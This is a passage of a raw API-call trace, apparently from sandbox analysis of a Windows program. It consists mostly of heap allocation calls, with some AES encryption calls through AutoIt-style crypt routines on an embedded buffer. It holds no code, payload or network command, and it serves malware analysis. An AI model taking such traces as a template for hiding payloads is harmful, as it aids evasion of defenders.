0x7ae928 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0042.353] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.354] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0042.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0042.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0042.357] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0042.357] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.358] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.358] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.358] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0042.358] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.358] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.358] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.358] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.359] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0042.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0042.359] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.359] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1340, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1350) returned 1 [0042.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.359] CharLowerBuffW (in: lpsz="byte[4945]", cchLength=0xa | out: lpsz="byte[4945]") returned 0xa [0042.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.360] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac46a8*, pdwDataLen=0x6ae220*=0x1340, dwBufLen=0x1350 | out: pbData=0xac46a8*, pdwDataLen=0x6ae220*=0x1350) returned 1 [0042.360] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0042.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.361] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.361] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0042.361] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.361] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.362] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.362] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.362] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 